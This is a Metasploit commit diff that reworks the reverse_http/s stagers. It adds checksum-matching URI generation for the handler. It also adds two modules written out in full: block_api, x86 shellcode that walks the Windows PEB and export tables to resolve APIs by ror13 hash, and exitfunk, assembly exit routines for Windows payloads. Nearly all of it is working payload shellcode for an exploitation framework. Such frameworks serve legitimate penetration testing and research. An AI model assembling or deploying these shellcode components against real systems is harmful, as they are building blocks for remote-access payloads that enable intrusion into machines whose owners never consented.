Land rapid7#4904, @hmoore-r7 reworks reverse_http/s stagers

They are now assembled dynamically and support more flexible options,
such as long URLs.

Author: Brent Cook

lib/msf/core/handler/reverse_http/uri_checksum.rb

@@ -76,8 +76,11 @@ def process_uri_resource(uri_match)
         # Create a URI that matches a given checksum
         #
         # @param sum [Fixnum] The checksum value you are trying to create a URI for
+        # @param len [Fixnum] An optional length value for the created URI
         # @return [String] The URI string that checksums to the given value
-        def generate_uri_checksum(sum)
+        def generate_uri_checksum(sum,len=nil)
+          return generate_uri_checksum_with_length(sum, len) if len
+
           chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
           32.times do
             uri = Rex::Text.rand_text_alphanumeric(3)
@@ -90,6 +93,35 @@ def generate_uri_checksum(sum)
           return URI_CHECKSUM_PRECALC[sum]
         end
 
+        # Create an arbitrary length URI that matches a given checksum
+        #
+        # @param sum [Fixnum] The checksum value you are trying to create a URI for
+        # @param len [Fixnum] The length of the created URI
+        # @return [String] The URI string that checksums to the given value
+        def generate_uri_checksum_with_length(sum, len)
+          # Lengths shorter than 4 bytes are unable to match all possible checksums
+          # Lengths of exactly 4 are relatively slow to find for high checksum values
+          # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
+          raise ArgumentError, "Length must be 5 bytes or greater" if len < 5
+
+          # Funny enough, this was more efficient than calculating checksum offsets
+          if len < 40
+            loop do
+              uri = Rex::Text.rand_text_alphanumeric(len)
+              return uri if Rex::Text.checksum8(uri) == sum
+            end
+          end
+
+          # The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes
+          # Calculating a static prefix flattens out the average runtime for longer URIs
+          prefix = Rex::Text.rand_text_alphanumeric(len-20)
+
+          loop do
+            uri = prefix + Rex::Text.rand_text_alphanumeric(20)
+            return uri if Rex::Text.checksum8(uri) == sum
+          end
+        end
+
       end
     end
   end

lib/msf/core/payload/windows.rb

@@ -150,5 +150,12 @@ def handle_intermediate_stage(conn, payload)
     return true
   end
 
+  #
+  # Share the EXITFUNC mappings with other classes
+  #
+  def self.exit_types
+    @@exit_types.dup
+  end
+
 end
 

lib/msf/core/payload/windows/block_api.rb

@@ -0,0 +1,112 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf
+
+
+###
+#
+# Basic block_api stubs for Windows ARCH_X86 payloads
+#
+###
+
+
+module Payload::Windows::BlockApi
+
+  def asm_block_api(opts={})
+
+    raw = %q^
+
+    api_call:
+      pushad                    ; We preserve all the registers for the caller, bar EAX and ECX.
+      mov ebp, esp              ; Create a new stack frame
+      xor eax, eax              ; Zero EAX (upper 3 bytes will remain zero until function is found)
+      mov edx, [fs:eax+48]      ; Get a pointer to the PEB
+      mov edx, [edx+12]         ; Get PEB->Ldr
+      mov edx, [edx+20]         ; Get the first module from the InMemoryOrder module list
+    next_mod:                   ;
+      mov esi, [edx+40]         ; Get pointer to modules name (unicode string)
+      movzx ecx, word [edx+38]  ; Set ECX to the length we want to check
+      xor edi, edi              ; Clear EDI which will store the hash of the module name
+    loop_modname:               ;
+      lodsb                     ; Read in the next byte of the name
+      cmp al, 'a'               ; Some versions of Windows use lower case module names
+      jl not_lowercase          ;
+      sub al, 0x20              ; If so normalise to uppercase
+    not_lowercase:              ;
+      ror edi, 13               ; Rotate right our hash value
+      add edi, eax              ; Add the next byte of the name
+      loop loop_modname         ; Loop untill we have read enough
+
+      ; We now have the module hash computed
+      push edx                  ; Save the current position in the module list for later
+      push edi                  ; Save the current module hash for later
+      ; Proceed to iterate the export address table
+      mov edx, [edx+16]         ; Get this modules base address
+      mov ecx, [edx+60]         ; Get PE header
+
+      ; use ecx as our EAT pointer here so we can take advantage of jecxz.
+      mov ecx, [ecx+edx+120]    ; Get the EAT from the PE header
+      jecxz get_next_mod1       ; If no EAT present, process the next module
+      add ecx, edx              ; Add the modules base address
+      push ecx                  ; Save the current modules EAT
+      mov ebx, [ecx+32]         ; Get the rva of the function names
+      add ebx, edx              ; Add the modules base address
+      mov ecx, [ecx+24]         ; Get the number of function names
+      ; now ecx returns to its regularly scheduled counter duties
+
+      ; Computing the module hash + function hash
+    get_next_func:              ;
+      jecxz get_next_mod        ; When we reach the start of the EAT (we search backwards), process the next module
+      dec ecx                   ; Decrement the function name counter
+      mov esi, [ebx+ecx*4]      ; Get rva of next module name
+      add esi, edx              ; Add the modules base address
+      xor edi, edi              ; Clear EDI which will store the hash of the function name
+      ; And compare it to the one we want
+    loop_funcname:              ;
+      lodsb                     ; Read in the next byte of the ASCII function name
+      ror edi, 13               ; Rotate right our hash value
+      add edi, eax              ; Add the next byte of the name
+      cmp al, ah                ; Compare AL (the next byte from the name) to AH (null)
+      jne loop_funcname         ; If we have not reached the null terminator, continue
+      add edi, [ebp-8]          ; Add the current module hash to the function hash
+      cmp edi, [ebp+36]         ; Compare the hash to the one we are searchnig for
+      jnz get_next_func         ; Go compute the next function hash if we have not found it
+
+      ; If found, fix up stack, call the function and then value else compute the next one...
+      pop eax                   ; Restore the current modules EAT
+      mov ebx, [eax+36]         ; Get the ordinal table rva
+      add ebx, edx              ; Add the modules base address
+      mov cx, [ebx+2*ecx]       ; Get the desired functions ordinal
+      mov ebx, [eax+28]         ; Get the function addresses table rva
+      add ebx, edx              ; Add the modules base address
+      mov eax, [ebx+4*ecx]      ; Get the desired functions RVA
+      add eax, edx              ; Add the modules base address to get the functions actual VA
+      ; We now fix up the stack and perform the call to the desired function...
+    finish:
+      mov [esp+36], eax         ; Overwrite the old EAX value with the desired api address for the upcoming popad
+      pop ebx                   ; Clear off the current modules hash
+      pop ebx                   ; Clear off the current position in the module list
+      popad                     ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+      pop ecx                   ; Pop off the origional return address our caller will have pushed
+      pop edx                   ; Pop off the hash value our caller will have pushed
+      push ecx                  ; Push back the correct return value
+      jmp eax                   ; Jump into the required function
+      ; We now automagically return to the correct caller...
+
+    get_next_mod:               ;
+      pop edi                   ; Pop off the current (now the previous) modules EAT
+    get_next_mod1:              ;
+      pop edi                   ; Pop off the current (now the previous) modules hash
+      pop edx                   ; Restore our position in the module list
+      mov edx, [edx]            ; Get the next module
+      jmp.i8 next_mod           ; Process this module
+    ^
+  end
+
+
+end
+
+end
+

lib/msf/core/payload/windows/exitfunk.rb

@@ -0,0 +1,79 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows'
+module Msf
+
+
+###
+#
+# Implements arbitrary exit routines for Windows ARCH_X86 payloads
+#
+###
+
+module Payload::Windows::Exitfunk
+
+  def asm_exitfunk(opts={})
+
+    asm = "exitfunk:\n"
+
+    case opts[:exitfunk]
+
+    when 'seh'
+      asm << %Q^
+          mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
+          push.i8 0              ; push the exit function parameter
+          push ebx               ; push the hash of the exit function
+          call ebp               ; SetUnhandledExceptionFilter(0)
+          push.i8 0
+          ret                    ; Return to NULL (crash)
+        ^
+
+    # On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
+    # on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
+    # automatically generate the right code depending on the selected exit method.
+
+    when 'thread'
+      asm << %Q^
+          mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
+          push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
+          call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+          cmp al, 6              ; If we are not running on Windows Vista, 2008 or 7
+          jl exitfunk_goodbye    ; Then just call the exit function...
+          cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+          jne exitfunk_goodbye   ;
+          mov ebx, 0x6F721347    ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+        exitfunk_goodbye:        ; We now perform the actual call to the exit function
+          push.i8 0              ; push the exit function parameter
+          push ebx               ; push the hash of the exit function
+          call ebp               ; call ExitThread(0) || RtlExitUserThread(0)
+        ^
+
+    when 'process', nil
+      asm << %Q^
+          mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
+          push.i8 0              ; push the exit function parameter
+          push ebx               ; push the hash of the exit function
+          call ebp               ; ExitProcess(0)
+        ^
+
+    when 'sleep'
+      asm << %Q^
+          mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
+          push 300000            ; 300 seconds
+          push ebx               ; push the hash of the function
+          call ebp               ; Sleep(300000)
+          jmp exitfunk           ; repeat
+        ^
+    else
+      # Do nothing and continue after the end of the shellcode
+    end
+
+    asm
+  end
+
+
+end
+
+end
+